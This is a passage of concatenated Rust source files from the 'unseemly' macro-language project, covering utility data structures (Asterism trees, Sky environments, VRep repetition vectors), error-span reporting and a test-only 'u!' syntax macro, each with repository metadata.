rep, template.clone()) } i += splice_length; other_i += splice_length; } else { i += 1; other_i += 1; } } // The lengths might not line up, but that doesn't mean matching will fail! // struct {a : Int b : Nat} <: struct {a : Int b : Nat c : Float} *repeat = Rc::new(cur_repeat) } Ok(()) } } impl<T: Clone, E: Clone> EnvMBE<Result<T, E>> { // Is `lift` the right term? pub fn lift_result(&self) -> Result<EnvMBE<T>, E> { // There's probably a nice and elegant way to do this with Result::from_iter, but not today let mut leaves: Assoc<Name, T> = Assoc::new(); for (k, v) in self.leaves.iter_pairs() { leaves = leaves.set(*k, (*v).clone()?); } let mut repeats = vec![]; for rep in &self.repeats { let mut items = vec![]; for item in &**rep { items.push(item.lift_result()?); } repeats.push(Rc::new(items)); } Ok(EnvMBE {
rust
MIT
dd1f55be7b09b741a25af954c7a902eeac00a0c2
2026-01-04T20:20:52.848824Z
true
paulstansifer/unseemly
https://github.com/paulstansifer/unseemly/blob/dd1f55be7b09b741a25af954c7a902eeac00a0c2/src/util/asterism.rs
src/util/asterism.rs
use std::{fmt, iter::Iterator}; // An `Asterism` is a tree with an arbirary arity at each node, // but all leaves are at the same depth. // This structure arises from parsing under Kleene stars; each star correspons to a level of nodes. // [ ] <- 2 children // [ ][ ] <- 3, 1 children // [ ][][ ][ ] <- 5, 0, 1, 2 children // [ ][ ][ ][ ][ ] [ ][ ][ ] <- 2, 1, 2, 2, 2, 4, 1, 1 children // a b c d e f g h i j k l m n o // * * # a b # c # d e # f g # h i * * # j k l m * * # n # o // ----| --| ----| ----| ----| | --------| --| --| <- these are `PackedNodes`es // ----------------------------| | ----------| --------| <- everything below is a `Node` // --------------------------------------------| ----------| <- ⋮ #[derive(Debug, PartialEq, Eq, Clone)] /// This is only `pub` for technical reasons; it doesn't need to be exposed to other modules. /// /// `Node`s and `PackedNodes`es appear at the beginning of a slice to guide marching. /// If you see `[PackedNodes, …]`, you know you're at depth 1 and [1..] is your leaves. /// Otherwise, `[Node(n), <n entries>, Node(m), <m entries>, …]` is the shape of the current level. pub enum LeafOrNode<T> { Leaf(T), /// A depth-1 node: *each* subtree is a single `Leaf` PackedNodes, /// A depth >1 node: *this* subtree is `usize` entires long Node(usize), } #[derive(PartialEq, Eq, Clone)] pub struct Asterism<T>(Vec<LeafOrNode<T>>); #[derive(PartialEq, Eq)] pub struct AsterismSlice<'a, T>(&'a [LeafOrNode<T>]); // `AsterismSlice` is a reference-like type, so it's always `Clone` and `Copy`, even if `T` isn't: impl<'a, T> Copy for AsterismSlice<'a, T> {} impl<'a, T> Clone for AsterismSlice<'a, T> { fn clone(&self) -> AsterismSlice<'a, T> { *self } } /// This trait is for reference-like views of `Asterism`. pub trait AsterMarchable<'a, T: 'a>: Sized + Clone + Copy { fn as_slice(self) -> AsterismSlice<'a, T>; /// Only used for implementation of other methods; /// adding another layer of trait seems like too much trouble to hide this. 
fn inner(self) -> &'a [LeafOrNode<T>]; /// Returns an iterator of `AsterMarchable<T>`s fn march(self) -> std::vec::IntoIter<AsterismSlice<'a, T>> { let mut subs = vec![]; if self.inner().is_empty() { return subs.into_iter(); } // A `PackedNodes` means the rest of the slice is our children (all leaves): let depth_1: bool = matches!(self.inner()[0], LeafOrNode::PackedNodes); let mut i = if depth_1 { 1 } else { 0 }; // Skip the `PackedNodes` while i < self.inner().len() { let span = match self.inner()[i] { LeafOrNode::Leaf(_) => { if !depth_1 { icp!("Unexpected Leaf") } 1 } LeafOrNode::PackedNodes => icp!("Unexpected PackedNodes"), LeafOrNode::Node(span) => { if depth_1 { icp!("Unexpected Node") } i += 1; span } }; subs.push(AsterismSlice(&self.inner()[i..i + span])); i += span; } subs.into_iter() } fn collect(self) -> Vec<AsterismSlice<'a, T>> { let mut res = vec![]; for sub in self.march() { res.push(sub); } res } fn is_leaf(self) -> bool { let inner = self.as_slice().0; if inner.is_empty() { return false; } matches!(inner[0], LeafOrNode::Leaf(_)) } fn as_leaf(self) -> &'a T { let inner = self.as_slice().0; if inner.len() != 1 { icp!("not a leaf, length is {}", inner.len()) } match inner[0] { LeafOrNode::Leaf(ref l) => l, _ => icp!("malformed Asterism"), } } fn as_depth_1(self) -> Box<dyn Iterator<Item = &'a T> + 'a> { if self.as_slice().0.is_empty() { // The "official" representation of an empty depth-1 node is a sequence with 1 `PN`. // ...but `Asterism::join(vec![])` doesn't know whether it's depth-1 or not! // So we also support an empty vector. // TODO: is there a better way? 
return Box::new(std::iter::empty()); } match self.as_slice().0[0] { LeafOrNode::PackedNodes => {} _ => icp!("Not depth-1"), } Box::new(self.as_slice().0[1..].iter().map(|lon| match lon { LeafOrNode::Leaf(ref l) => l, _ => icp!("Not depth-1"), })) } } impl<'a, T> AsterMarchable<'a, T> for AsterismSlice<'a, T> { fn as_slice(self) -> AsterismSlice<'a, T> { self } fn inner(self) -> &'a [LeafOrNode<T>] { self.0 } } impl<'a, T> AsterMarchable<'a, T> for &'a Asterism<T> { fn as_slice(self) -> AsterismSlice<'a, T> { AsterismSlice(&self.0[..]) } fn inner(self) -> &'a [LeafOrNode<T>] { &self.0[..] } } impl<T> Asterism<T> { pub fn join(subs: Vec<Asterism<T>>) -> Asterism<T> { let mut res = vec![]; if subs.is_empty() { return Asterism(vec![LeafOrNode::Node(0)]); } if !subs[0].0.is_empty() && matches!(subs[0].0[0], LeafOrNode::Leaf(_)) { let mut res = vec![LeafOrNode::PackedNodes]; for mut leaf_asterism in subs { if !leaf_asterism.is_leaf() { icp!("Not a valid leaf"); } res.push(leaf_asterism.0.remove(0)); } return Asterism(res); } for mut aster in subs { res.push(LeafOrNode::Node(aster.0.len())); res.append(&mut aster.0); } Asterism(res) } pub fn from_leaf(leaf: T) -> Asterism<T> { Asterism(vec![LeafOrNode::Leaf(leaf)]) } pub fn from_depth_1(leaves: Vec<T>) -> Asterism<T> { let mut res = vec![LeafOrNode::PackedNodes]; for leaf in leaves { res.push(LeafOrNode::Leaf(leaf)) } Asterism(res) } } impl<'a, T: Clone> AsterismSlice<'a, T> { pub fn to_asterism(self) -> Asterism<T> { Asterism(self.0.to_vec()) } } impl<T: fmt::Debug> fmt::Debug for AsterismSlice<'_, T> { fn fmt(&self, f: &mut fmt::Formatter) -> fmt::Result { if self.is_leaf() { write!(f, "{:?}", self.as_leaf()) } else { write!(f, "[")?; let mut first = true; for ref sub in self.march() { if !first { write!(f, " ")?; } write!(f, "{:?}", sub)?; first = false; } write!(f, "]") } } } impl<T: fmt::Debug> fmt::Debug for Asterism<T> { fn fmt(&self, f: &mut fmt::Formatter) -> fmt::Result { self.as_slice().fmt(f) } } impl<T: 
fmt::Display> fmt::Display for AsterismSlice<'_, T> { fn fmt(&self, f: &mut fmt::Formatter) -> fmt::Result { if self.is_leaf() { write!(f, "{}", self.as_leaf()) } else { write!(f, "[")?; let mut first = true; for ref sub in self.march() { if !first { write!(f, " ")?; } write!(f, "{}", sub)?; first = false; } write!(f, "]") } } } impl<T: fmt::Display> fmt::Display for Asterism<T> { fn fmt(&self, f: &mut fmt::Formatter) -> fmt::Result { self.as_slice().fmt(f) } } impl<T: fmt::Debug> Asterism<T> { /// For internal debugging only fn show(&self) { for elt in &self.0 { match elt { LeafOrNode::Node(n) => print!("N{} ", n), LeafOrNode::PackedNodes => print!("PN "), LeafOrNode::Leaf(l) => print!("L{:?} ", l), } } } } #[test] fn asterism_basics() { let abc = Asterism::from_depth_1(vec!["a", "b", "c"]); assert_eq!(abc.as_slice().as_depth_1().collect::<Vec<_>>(), vec![&"a", &"b", &"c"]); let (a, b, c, d, e, f, g, h, i, j, k, l, m, n, o) = (0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14); let a_through_i = Asterism::join(vec![ Asterism::from_depth_1(vec![a, b]), Asterism::from_depth_1(vec![c]), Asterism::from_depth_1(vec![d, e]), Asterism::from_depth_1(vec![f, g]), Asterism::from_depth_1(vec![h, i]), ]); let a_through_m = Asterism::join(vec![ a_through_i, Asterism::join(vec![]), // Empty `Asterism`s can be deeper than they look Asterism::join(vec![Asterism::from_depth_1(vec![j, k, l, m])]), ]); let a_through_o = Asterism::join(vec![ a_through_m, Asterism::join(vec![Asterism::join(vec![ Asterism::from_depth_1(vec![n]), Asterism::from_depth_1(vec![o]), ])]), ]); assert_eq!( format!("{}", a_through_o), "[[[[0 1] [2] [3 4] [5 6] [7 8]] [[]] [[9 10 11 12]]] [[[13] [14]]]]" ); let mut expected_d1 = 0; let mut expected_m = 0; for m in a_through_o.march() { for mm in m.march() { for mmm in mm.march() { for mmmm in mmm.as_depth_1() { assert_eq!(*mmmm, expected_d1); expected_d1 += 1; } for mmmm in mmm.march() { assert_eq!(*mmmm.as_leaf(), expected_m); expected_m += 1; } } } } 
assert_eq!(15, expected_d1); assert_eq!(15, expected_m); let d1 = Asterism::from_depth_1(vec![vec![1, 3], vec![2, 3]]); for v in d1.as_depth_1() { assert_eq!(v.len(), 2) } }
rust
MIT
dd1f55be7b09b741a25af954c7a902eeac00a0c2
2026-01-04T20:20:52.848824Z
false
paulstansifer/unseemly
https://github.com/paulstansifer/unseemly/blob/dd1f55be7b09b741a25af954c7a902eeac00a0c2/src/util/err.rs
src/util/err.rs
use codespan_reporting::{ diagnostic::{Diagnostic, Label}, term::termcolor::{Ansi, ColorChoice, StandardStream, WriteColor}, }; use std::fmt::{Debug, Display, Formatter, Result}; custom_derive! { #[derive(Reifiable, Clone, PartialEq)] pub struct Spanned<T> { // The actual contents are ignored; only the span information is used. // (Unless the span is a ficitious `Ast`, which Should Not Happen, but does.) pub loc: crate::ast::Ast, pub body: T } } pub fn sp<T>(t: T, a: crate::ast::Ast) -> Spanned<T> { Spanned { loc: a, body: t } } impl<T: Display> Spanned<T> { pub fn emit_to_writer(&self, mut writer: &mut dyn WriteColor) { let diagnostic = Diagnostic::error().with_message(format!("{}", self.body)).with_labels(vec![ Label::primary(self.loc.0.file_id, self.loc.0.begin..self.loc.0.end), ]); let config = codespan_reporting::term::Config::default(); if let Err(_) = crate::earley::files.with(|f| { codespan_reporting::term::emit(&mut writer, &config, &*f.borrow(), &diagnostic) }) { writer.write(format!("[NO FILE] {} at {}", self.body, self.loc).as_bytes()).unwrap(); } } pub fn emit(&self) { let mut writer = StandardStream::stderr(ColorChoice::Always); self.emit_to_writer(&mut writer); } } // Temporary HACK: capture the ANSI terminal output in a string, // assuming we'll get printed to a terminal. impl<T: Display> Display for Spanned<T> { fn fmt(&self, f: &mut Formatter) -> Result { let mut writer = Ansi::new(Vec::<u8>::new()); self.emit_to_writer(&mut writer); write!(f, "{}", std::str::from_utf8(&writer.into_inner()).unwrap()) } } // Force pretty version impl<T: Display> Debug for Spanned<T> { fn fmt(&self, f: &mut Formatter) -> Result { let mut writer = Ansi::new(Vec::<u8>::new()); self.emit_to_writer(&mut writer); write!(f, "{}", std::str::from_utf8(&writer.into_inner()).unwrap()) } }
rust
MIT
dd1f55be7b09b741a25af954c7a902eeac00a0c2
2026-01-04T20:20:52.848824Z
false
paulstansifer/unseemly
https://github.com/paulstansifer/unseemly/blob/dd1f55be7b09b741a25af954c7a902eeac00a0c2/src/util/mod.rs
src/util/mod.rs
pub mod assoc; pub mod asterism; pub mod err; pub mod mbe; pub mod sky; pub mod vrep;
rust
MIT
dd1f55be7b09b741a25af954c7a902eeac00a0c2
2026-01-04T20:20:52.848824Z
false
paulstansifer/unseemly
https://github.com/paulstansifer/unseemly/blob/dd1f55be7b09b741a25af954c7a902eeac00a0c2/src/util/sky.rs
src/util/sky.rs
use crate::{ name::Name, util::{ assoc::Assoc, asterism::{AsterMarchable, Asterism, AsterismSlice}, }, }; use std::iter::Iterator; type Sky<T> = Assoc<Name, Asterism<T>>; /// `SkySlice` isn't a slice itself, /// so we can't pull the same trick we pulled with `AsterismSlice`. /// (Maybe rename it, then?) type SkySlice<'a, T> = Assoc<Name, AsterismSlice<'a, T>>; impl<'a, T> SkySlice<'a, T> where T: Clone { fn get(&self, n: Name) -> AsterismSlice<'a, T> { *self.find_or_panic(&n) } fn combine_overriding(&self, rhs: &Self) -> Assoc<Name, AsterismSlice<'a, T>> { self.set_assoc(rhs) } #[deprecated] // In `EnvMBE`, this respected named repeats. fn merge(&self, rhs: &Self) -> Assoc<Name, AsterismSlice<'a, T>> { self.set_assoc(rhs) } /// Each of `driving_names` must be a repetition of the same length. /// Produces an iterator with the same length, /// yielding `SkySlice`s in which the driven names have that repetition removed. fn march(&self, driving_names: &[Name]) -> Box<dyn Iterator<Item = SkySlice<'a, T>> + 'a> { let marchers: Vec<(Name, std::vec::IntoIter<AsterismSlice<'a, T>>)> = driving_names.iter().map(|n| (*n, self.get(*n).march())).collect(); // Require the lengths to be the same for (n, marcher) in &marchers[1..] { if marcher.len() != marchers[0].1.len() { icp!( "Lengths don't match in march names: {} ({}) != {} ({})", marcher.len(), n, marchers[0].1.len(), marchers[0].0 ); } } // By default, names refer to the same Asterims (just sliced) let mut res: Box<dyn Iterator<Item = SkySlice<'a, T>> + 'a> = Box::new(std::iter::repeat(self.clone())); // For the driving names, override with the current step of the march for (name, marched) in marchers { res = Box::new(res.zip(marched.into_iter()).map( move |(base, marched): (SkySlice<T>, AsterismSlice<T>)| base.set(name, marched), )); } res } #[deprecated(note = "use `march` instead")] // The `_all` is no longer meaningful. This does a bunch of unnecessary cloning. 
fn march_all(&self, driving_names: &[Name]) -> Vec<Sky<T>> { self.march(driving_names).map(|s| s.to_sky()).collect() } #[deprecated(note = "do we need this?")] fn get_leaf<'b>(&'b self, n: Name) -> Option<&'a T> { match self.find(&n) { None => None, Some(aster) => Some(aster.as_leaf()), } } fn leaf<'b>(&'b self, n: Name) -> &'a T where 'a: 'b { self.get(n).as_leaf() } #[deprecated(note = "use `leaf` instead")] fn get_leaf_or_panic(&self, n: Name) -> &T { self.get(n).as_leaf() } #[deprecated(note = "use `depth_1` instead")] fn get_rep_leaf(&self, n: Name) -> Option<Vec<&T>> { self.find(&n).map(|asterism| asterism.as_depth_1().collect::<Vec<&T>>()) } #[deprecated(note = "use `depth_1` instead")] fn get_rep_leaf_or_panic(&'a self, n: Name) -> Vec<&'a T> { self.get(n).as_depth_1().collect::<Vec<&T>>() } fn depth_1<'b>(&'b self, n: Name) -> Box<dyn std::iter::Iterator<Item = &'a T> + 'a> { self.get(n).as_depth_1() } // fn map_flatten_rep_leaf_or_panic<S>(&self, n: Name, depth: u8, m: &dyn Fn(&T) -> S, f: &dyn Fn(Vec<S>) -> S) -> S { // unimplemented!() // } } impl<T: Clone> SkySlice<'_, T> { pub fn to_sky(&self) -> Sky<T> { self.map_borrow_f(&mut |a: &AsterismSlice<T>| a.to_asterism()) } } impl<T: Clone> Sky<T> { // `l` could be a reference, but do we ever want that? 
pub fn new_from_leaves(l: Assoc<Name, T>) -> Self { l.map(|l| Asterism::from_leaf(l.clone())) } #[deprecated] pub fn new_from_named_repeat(_n: Name, r: Vec<Self>) -> Self { Self::new_from_anon_repeat(r) } pub fn new_from_anon_repeat(mut r: Vec<Self>) -> Self { if r.is_empty() { return Sky::new(); } let mut res = Assoc::<Name, Asterism<T>>::new(); if !r.is_empty() { let keys: Vec<Name> = r[0].iter_keys().copied().collect(); for k in keys { let per_name_asterisms: Vec<Asterism<T>> = r.iter_mut().map(|sky| sky.remove_or_panic(&k)).collect(); res = res.set(k, Asterism::join(per_name_asterisms)); } } res } pub fn leaf(&self, n: Name) -> &T { self.find_or_panic(&n).as_leaf() } pub fn depth_1<'b>(&'b self, n: Name) -> Box<dyn std::iter::Iterator<Item = &'b T> + 'b> { self.find_or_panic(&n).as_depth_1() } pub fn to_sky_slices<'b>(&'b self) -> SkySlice<'b, T> { self.map_borrow_f(&mut |a: &Asterism<T>| a.as_slice()) } pub fn march<'b>( &'b self, driving_names: &'b [Name], ) -> Box<dyn Iterator<Item = SkySlice<'b, T>> + 'b> { self.to_sky_slices().march(driving_names) } pub fn add_leaf(&mut self, n: Name, v: T) { self.mut_set(n, Asterism::from_leaf(v)); } #[deprecated(note = "inefficent, and named repeats are gone")] pub fn add_named_repeat(&mut self, _: Name, sub: Vec<Sky<T>>) { self.add_anon_repeat(sub) } // TODO: how DO we construct in a general case? #[deprecated(note = "inefficent")] pub fn add_anon_repeat(&mut self, sub: Vec<Sky<T>>) { if sub.is_empty() || sub[0].empty() { return; } for n in sub[0].iter_keys() { let asters: Vec<Asterism<T>> = sub.iter().map(|sky| sky.find_or_panic(n).clone()).collect(); self.mut_set(*n, Asterism::join(asters)); } } #[deprecated(note = "named repeats are gone")] pub fn anonimize_repeat(&mut self, _: Name) {} } // TODO: move these to macros.rs (and fully-qualify their names) macro_rules! asterism { ([$( $sub:tt ),*]) => { Asterism::join(vec![ $( asterism!($sub) ),* ]) }; ($leaf:expr) => { Asterism::from_leaf($leaf) }; } macro_rules! 
sky { ( $($n:tt => $rhs:tt),* ) => { assoc_n!( $( (stringify!($n)) => asterism!($rhs) ),* ) }; } #[test] fn sky_basics() { use crate::name::n; let abc: Sky<usize> = sky!( a => [[1, 2], [3], []], b => 9, c => [4, 5, 6], d => [7, 8] ); assert_eq!(abc.leaf(n("b")), &9); assert_eq!(abc.depth_1(n("c")).collect::<Vec<_>>(), vec![&4, &5, &6]); let mut cur_c = 4; for abccc in abc.march(&[n("c")]) { assert_eq!(abccc.leaf(n("b")), &9); assert_eq!(abccc.leaf(n("c")), &cur_c); cur_c += 1; assert_eq!(abccc.depth_1(n("d")).collect::<Vec<_>>(), vec![&7, &8]); } }
rust
MIT
dd1f55be7b09b741a25af954c7a902eeac00a0c2
2026-01-04T20:20:52.848824Z
false
paulstansifer/unseemly
https://github.com/paulstansifer/unseemly/blob/dd1f55be7b09b741a25af954c7a902eeac00a0c2/src/util/vrep.rs
src/util/vrep.rs
use crate::{ name::{n, Name}, runtime::reify::Reifiable, }; use std::iter::FromIterator; custom_derive! { #[derive(Clone, PartialEq, Eq, Debug, Reifiable)] pub enum VRepElt<T> { Single(T), Rep(T, Vec<Name>), } } impl<T> VRepElt<T> { pub fn map<'a, U, F>(&'a self, f: &mut F) -> VRepElt<U> where F: FnMut(&'a T) -> U { match self { Single(e) => Single(f(e)), Rep(e, names) => Rep(f(e), names.clone()), } } pub fn into_map<U, F>(self, f: &mut F) -> VRepElt<U> where F: FnMut(T) -> U { match self { Single(e) => Single(f(e)), Rep(e, names) => Rep(f(e), names), } } pub fn zip_map<U, F>(&self, other: &VRepElt<T>, mut f: F) -> Option<VRepElt<U>> where F: FnMut(&T, &T) -> U { match (self, other) { (Single(s), Single(r)) => Some(Single(f(s, r))), (Rep(s, s_names), Rep(r, r_names)) if s_names == r_names => { Some(Rep(f(s, r), s_names.clone())) } _ => None, } } } use VRepElt::*; #[derive(Debug, PartialEq, Eq)] pub enum VRepLen { Exactly(usize), AtLeast(usize), } #[derive(Clone, PartialEq, Eq)] pub struct VRep<T>(Vec<VRepElt<T>>); pub struct SRep<'a, T>(&'a [VRepElt<T>]); impl<T> VRep<T> { pub fn expand_reps<F>(&self, mut f: F) -> Vec<T> where F: FnMut(&T, &Vec<Name>) -> Vec<T>, T: Clone, { let mut res = vec![]; for elt in &self.0 { match elt { Single(e) => res.push(e.clone()), Rep(es, names) => { let mut expanded = f(es, names); res.append(&mut expanded) } } } res } pub fn concrete(&self) -> bool { for elt in &self.0 { match elt { Rep(_, _) => return false, Single(_) => {} } } return true; } pub fn is_empty(&self) -> bool { self.0.is_empty() } pub fn can_be_empty(&self) -> bool { for elt in &self.0 { match elt { Rep(_, _) => {} Single(_) => return false, } } return true; } pub fn len(&self) -> VRepLen { let mut min_len: usize = 0; let mut exact: bool = true; for elt in &self.0 { match elt { Single(_) => min_len += 1, Rep(_, _) => exact = false, } } if exact { VRepLen::Exactly(min_len) } else { VRepLen::AtLeast(min_len) } } pub fn iter(&self) -> std::slice::Iter<VRepElt<T>> { 
self.0.iter() } pub fn map<'a, U, F>(&'a self, mut f: F) -> VRep<U> where F: FnMut(&'a T) -> U { let mut res = vec![]; for elt in &self.0 { res.push(elt.map(&mut f)); } VRep(res) } pub fn into_map<U, F>(self, mut f: F) -> VRep<U> where F: FnMut(T) -> U { let mut res = vec![]; for elt in self.0 { res.push(elt.into_map(&mut f)); } VRep(res) } } // Only needed because our custom_derive! doesn't support newtype-style structs: impl<T: Clone + Reifiable> Reifiable for VRep<T> { fn ty_name() -> Name { n("VRep") } fn concrete_arguments() -> Option<Vec<crate::ast::Ast>> { Some(vec![T::ty_invocation()]) } fn reify(&self) -> crate::runtime::eval::Value { let res: Vec<_> = self.0.iter().map(|e| std::rc::Rc::new(e.reify())).collect(); crate::runtime::eval::Value::Sequence(res) } fn reflect(v: &crate::runtime::eval::Value) -> Self { let mut res = vec![]; extract!((v) crate::runtime::eval::Value::Sequence = (ref parts) => { for part in parts { res.push(<VRepElt<T>>::reflect(&**part)); } }); VRep(res) } } // Turns a plain Vec into a VRep without repetitions impl<T> From<Vec<T>> for VRep<T> { fn from(flat: Vec<T>) -> Self { VRep(flat.into_iter().map(Single).collect()) } } impl<T: std::fmt::Debug> std::fmt::Debug for VRep<T> { fn fmt(&self, f: &mut std::fmt::Formatter) -> std::fmt::Result { write!(f, "[")?; let mut first = false; for elt in &self.0 { if !first { write!(f, ", ")?; } first = false; match elt { Single(e) => write!(f, "{:?}", e)?, Rep(e, names) => write!(f, "{:?} ...({:?})", e, names)?, } } write!(f, "]") } } impl<T> IntoIterator for VRep<T> { type Item = VRepElt<T>; type IntoIter = std::vec::IntoIter<Self::Item>; fn into_iter(self) -> Self::IntoIter { self.0.into_iter() } } impl<'a, T: 'a> IntoIterator for &'a VRep<T> { type Item = &'a VRepElt<T>; type IntoIter = std::slice::Iter<'a, VRepElt<T>>; fn into_iter(self) -> Self::IntoIter { self.0.iter() } } impl<T> FromIterator<VRepElt<T>> for VRep<T> { fn from_iter<I: IntoIterator<Item = VRepElt<T>>>(iter: I) -> Self { let 
mut res = vec![]; for i in iter { res.push(i); } VRep(res) } } #[test] fn vrep_basics() { assert_eq!(vrep![1, 2, 3, 4, 5], VRep::from(vec![1, 2, 3, 4, 5])); assert_eq!(vrep![1, 2, 3, 4, 5].len(), VRepLen::Exactly(5)); let with_rep = vrep![1, 2 => (a, b, c), 3]; assert_eq!(with_rep.len(), VRepLen::AtLeast(2)); assert_eq!(with_rep.expand_reps(|_, _| vec![7, 7, 7]), vec![1, 7, 7, 7, 3]); // Reification roundtrip: assert_eq!(with_rep, <VRep<i32>>::reflect(&with_rep.reify())) }
rust
MIT
dd1f55be7b09b741a25af954c7a902eeac00a0c2
2026-01-04T20:20:52.848824Z
false
paulstansifer/unseemly
https://github.com/paulstansifer/unseemly/blob/dd1f55be7b09b741a25af954c7a902eeac00a0c2/src/macros/flimsy_syntax.rs
src/macros/flimsy_syntax.rs
#![macro_use] // For testing purposes, we want to generate valid `Ast`s, // but `ast!` is clunky and makes it *super* easy to leave off `Quote*` and `ExtendEnv` // and actually running the parser is a big dependency (and requires huge string literals). // so we introduce a `u!` macro that looks up forms but infers the internal structure. // It's weird to be relying on the grammar while ignoring parts of it, hence "flimsy", // but errors are much more likely to be compile-time than inscrutable test problems. // It's not unsafe to use `u!` for runtime operations, but there's a runtime cost, so don't do it. // TODO #20: Translate most `ast!`s in tests to `u!`s. // // `u!` is for expressions, and `uty!` is for types. // // Simple example: // `{apply : plus [one ; one]}` represents `(plus one one)`. // * Use a bareword (`apply`) to find the AST node, // and then put arguments in the order they appear in the syntax, // in this case, first the rator and then the rands. // * Use `[ ]` around a repeated argument. // * Variable references (`one`) and atoms are just plain barewords. // // Another example: // `{lambda : [a {Type Int :} ; b {Type Int :}] {apply : plus [a ; b]}}` // * Note that arguments repeated together can be grouped // (just put a semicolon between the repetitions). // * Also, you need to explicitly use `{Type <form_name> : ...}` or `{Expr <form_name> : ...}` // to switch nonterminals. // * Note that the difference between variable references and atoms is inferred. use crate::{ ast::{Ast, AstContents::*}, grammar::FormPat, name::*, util::mbe::EnvMBE, }; use std::iter::{Iterator, Peekable}; // AstContents to Ast macro_rules! raw_ast { ($ast_kind:ident) => { crate::ast::Ast(std::rc::Rc::new(crate::ast::LocatedAst { c: crate::ast::AstContents::$ast_kind, // TODO: would Rust file info be useful? 
file_id: 0, begin: 0, end: 0 })) }; ($ast_kind:ident ( $( $body:expr ),* ) ) => { crate::ast::Ast(std::rc::Rc::new(crate::ast::LocatedAst { c: crate::ast::AstContents::$ast_kind( $( $body ),* ), // TODO: would Rust file info be useful? file_id: 0, begin: 0, end: 0 })) } } macro_rules! atom { ($nm:tt) => { raw_ast!(Atom(crate::name::n($nm))) }; } // First, transforms from `[a b c; d e f; g h i]` to `[g h i] {[a b c] [d e f]}` // to get around a Rust macro parsing restriction, // then makes a REP flimsy shape for it. macro_rules! u_rep { ([; $( $ts:tt )*] $acc_cur:tt { $( $acc_rest:tt )* }) => { u_rep!( [ $( $ts )* ] [] { $( $acc_rest )* $acc_cur }) }; ([$t:tt $( $ts:tt )*] [ $( $acc_cur:tt )* ] { $( $acc_rest:tt )* }) => { u_rep!( [ $( $ts )* ] [$($acc_cur)* $t] { $( $acc_rest )* }) }; ([] [] {}) => { // Empty repeat raw_ast!(Shape(vec![atom!("REP")])) }; ([] [ $( $acc_cur:tt )* ] { $( [ $( $acc_rest:tt )* ] )* }) => { raw_ast!(Shape(vec![ atom!("REP"), $( u_shape_if_many!( $($acc_rest)* ), )* u_shape_if_many!( $($acc_cur)* ) ])) }; } macro_rules! u_shape_if_many { ($t:tt) => { u!($t) }; () => { compile_error!("empty u!") }; ( $($ts:tt)* ) => { u!((~ $($ts)* )) }; } thread_local! { pub static default_nt: std::cell::RefCell<String> = std::cell::RefCell::new("Expr".to_owned()); } macro_rules! 
u { ($atom:ident) => { // Default to this, because `Call` will use whatever it's given, without a grammar: raw_ast!(VariableReference(n(stringify!($atom)))) }; ( [ , $seq:expr ] ) => { { let mut contents: Vec<Ast> = $seq; contents.insert(0, atom!("REP")); raw_ast!(Shape(contents)) } }; ( [ $( $ts:tt )* ] ) => { u_rep!( [$($ts)*] [] {} ) }; ( { $form:ident : $( $ts:tt )*} ) => { { let f = crate::macros::flimsy_syntax::default_nt.with(|def_nt| { crate::core_forms::find_core_form(&def_nt.borrow(), stringify!($form)) }); raw_ast!(Node(f.clone(), crate::macros::flimsy_syntax::parse_flimsy_mbe(&u!( (~ $($ts)* ) ), &f.grammar) .unwrap_or_else(crate::util::mbe::EnvMBE::new), crate::beta::ExportBeta::Nothing)) } }; ( { $nt:ident $form:ident : $( $ts:tt )*} ) => { { let mut old_default_nt = "".to_owned(); let f = crate::macros::flimsy_syntax::default_nt.with(|def_nt| { old_default_nt = def_nt.borrow().clone(); let nt = stringify!($nt); *def_nt.borrow_mut() = nt.to_string(); crate::core_forms::find_core_form(&nt, stringify!($form)) }); let res = raw_ast!(Node(f.clone(), crate::macros::flimsy_syntax::parse_flimsy_mbe(&u!( (~ $($ts)* ) ), &f.grammar) .unwrap_or_else(crate::util::mbe::EnvMBE::new), crate::beta::ExportBeta::Nothing)); crate::macros::flimsy_syntax::default_nt.with(|def_nt| { *def_nt.borrow_mut() = old_default_nt; }); res } }; // The need for explicit exports is unfortunate; // that information is part of `Scope`, not `Form` (maybe we should change that?) 
( { $form:ident => $ebeta:tt : $( $ts:tt )*} ) => { { let f = crate::macros::flimsy_syntax::default_nt.with(|def_nt| { crate::core_forms::find_core_form(&def_nt.borrow(), stringify!($form)) }); raw_ast!(Node(f.clone(), crate::macros::flimsy_syntax::parse_flimsy_mbe(&u!( (~ $($ts)* ) ), &f.grammar) .unwrap_or_else(crate::util::mbe::EnvMBE::new), ebeta!($ebeta))) } }; ( { $nt:ident $form:ident => $ebeta:tt : $( $ts:tt )*} ) => { { // code duplication from above ) : let mut old_default_nt = "".to_owned(); let f = crate::macros::flimsy_syntax::default_nt.with(|def_nt| { old_default_nt = def_nt.borrow().clone(); let nt = stringify!($nt); *def_nt.borrow_mut() = nt.to_string(); crate::core_forms::find_core_form(&nt, stringify!($form)) }); let res =raw_ast!(Node(f.clone(), crate::macros::flimsy_syntax::parse_flimsy_mbe(&u!( (~ $($ts)* ) ), &f.grammar) .unwrap_or_else(crate::util::mbe::EnvMBE::new), ebeta!($ebeta))); crate::macros::flimsy_syntax::default_nt.with(|def_nt| { *def_nt.borrow_mut() = old_default_nt; }); res } }; ( { $form:expr ; $( $ts:tt )*} ) => { { let f = $form; raw_ast!(Node(f.clone(), crate::macros::flimsy_syntax::parse_flimsy_mbe(&u!( (~ $($ts)* ) ), &f.grammar) .unwrap_or_else(crate::util::mbe::EnvMBE::new), crate::beta::ExportBeta::Nothing)) } }; ({ $( $anything:tt )* }) => { compile_error!("Needed a : or ; in u!"); }; // Currently, nested `Seq`s need to correspond to nested `SEQ`s, so this creates one explicitly: ((~ $($ts:tt)*)) => { raw_ast!(Shape(vec![ atom!("SEQ"), $( u!( $ts ) ),* ])) }; ((at $t:tt)) => { raw_ast!(Atom(n(stringify!($t)))) }; ((prim $t:tt)) => { crate::core_type_forms::get__primitive_type(n(stringify!($t))) }; ((, $interpolate:expr)) => { $interpolate }; // Two or more token trees (avoid infinite regress by not handling the one-element case) ( $t_first:tt $t_second:tt $( $t:tt )* ) => { raw_ast!(Shape(vec![ atom!("SEQ"), u!( $t_first ), u!( $t_second ), $( u!( $t ) ),* ])) }; } macro_rules! 
